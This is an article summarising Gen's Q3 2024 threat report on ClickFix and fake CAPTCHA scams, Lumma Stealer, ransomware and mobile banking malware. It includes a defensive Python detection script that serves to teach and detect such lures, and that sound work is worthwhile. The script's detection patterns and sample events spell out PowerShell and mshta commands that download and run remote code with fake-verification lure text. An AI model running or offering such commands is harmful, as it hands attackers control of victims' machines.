Hackers trick victims into scam attacks with fake tutorials, CAPTCHAs and updates
- AI continues to play a dual role in cybersecurity
- Lumma Stealer rises 1154%, marking a new malware peak
- Outdated systems remain vulnerable to ransomware
In its recent Threat Report for the third quarter of 2024, Gen highlights alarming trends that reveal the increasing complexity of cyber threats, emphasizing that as cybercriminals refine their methods, the dual role of AI is becoming apparent.
While AI can be used to amplify attacks by spreading realistic deepfakes and highly convincing phishing campaigns, AI tools also serve as a crucial defense mechanism.
As cyber threats become more sophisticated and difficult to detect, awareness and proactive measures are essential for protecting sensitive information.
Social engineering tactics take center stage
Cybercriminals are increasingly using social engineering tactics to trick millions of people into compromising their security. Quarter-over-quarter, there has been a 614% increase in “Scam-Yourself Attacks,” which use psychological manipulation to trick individuals into unintentionally installing malware on their own devices.
Attackers will use fake tutorials shared on popular platforms such as YouTube, claiming to offer free access to paid software, enticing users to follow the instructions. However, victims unintentionally download malicious programs instead.
Another tactic, known as ClickFix Scams, deceives victims by proposing fake technical solutions and then instructing users to copy and paste malicious code into their command prompts, unknowingly giving attackers control over their systems.
Similarly, fake CAPTCHA prompts have emerged disguised as standard authentication steps, prompting users to paste malicious code into their systems. Fake updates masquerading as critical software updates are also sent to users, loaded with malware designed to gain administrative privileges once installed.
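For defenders, the ClickFix and fake CAPTCHA lures described above leave a recognizable trace: a shell command launched interactively that downloads and runs remote content, often with lure text appended. The following triage heuristic is an added example, not part of the Gen report; the regex patterns, the threshold, the event field names and the sample telemetry are all assumptions constructed for illustration.

```python
import re

# Heuristics for commands a user was talked into pasting. Patterns, threshold
# and event field names are illustrative assumptions, not taken from the report.
INDICATORS = {
    "hidden_window": re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I),
    "encoded_command": re.compile(r"\s-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_and_run": re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|curl|wget)\b.*[|;]\s*"
        r"(iex|invoke-expression|sh|bash)\b", re.I),
    "remote_script_host": re.compile(r"\bmshta(\.exe)?\s+https?://", re.I),
    # Lure text appended as a trailing comment so the pasted line looks harmless.
    "fake_verification_text": re.compile(r"not a robot|verification id|captcha", re.I),
}

# Parents that suggest a human typed or pasted the command (Run dialog, console).
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe"}

def indicators(cmdline):
    """Return the sorted names of all indicators present in one command line."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(cmdline))

def triage(events, threshold=2):
    """Flag interactively launched commands matching >= threshold indicators."""
    alerts = []
    for ev in events:
        parent = ev["parent"].rsplit("\\", 1)[-1].lower()
        hits = indicators(ev["cmdline"])
        if parent in INTERACTIVE_PARENTS and len(hits) >= threshold:
            alerts.append((ev["host"], hits))
    return alerts

# Constructed sample telemetry (hosts, paths and URLs are placeholders).
SAMPLE_EVENTS = [
    {"host": "ws-01", "parent": r"C:\Windows\explorer.exe",
     "cmdline": 'powershell -w hidden -c "irm https://example.invalid/v | iex" '
                "# I am not a robot - Verification ID: 0000"},
    {"host": "ws-02", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "mshta https://example.invalid/check.hta # reCAPTCHA Verification ID: 0000"},
    {"host": "ws-03", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell -NoProfile -File C:\Scripts\backup.ps1"},
    {"host": "build-01", "parent": r"C:\Program Files\CI\agent.exe",
     "cmdline": 'powershell -w hidden -c "irm https://example.invalid/tool.ps1 | iex"'},
]

if __name__ == "__main__":
    for host, hits in triage(SAMPLE_EVENTS):
        print(host, ", ".join(hits))
```

The build agent event matches two indicators but is not flagged because its parent is not interactive; in practice that case belongs to a separate rule tuned for automation accounts.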
Data-stealing malware and ransomware have seen a resurgence, with the number of information stealers increasing by 39%. For example, the Lumma Stealer increased its activity by 1154%.
Ransomware attacks also increased sharply, with the risk rising by 100%. The Magniber ransomware led these attacks by exploiting unpatched software to gain access. Outdated systems such as Windows 7 remain particularly vulnerable, but Gen has worked with governments to release free decryption tools such as the Avast Mallox Ransomware Decryptor.
Mobile devices also saw a rise in data-stealing malware attacks, which increased 166% in the third quarter of 2024. A new strain of spyware emerged, NGate, which could clone bank card details to withdraw money or make unauthorized transactions. Meanwhile, banking malware such as Rocinante has increased by 60%, with new variants such as TrickMo and Octo2 emerging.
In terms of delivery, malicious text messages remain the primary delivery method. Norton Genie telemetry shows that smishing (malicious SMS fraud) is responsible for 16.5% of observed attacks, followed by lottery fraud (12%) and phishing emails/SMS (9.6%).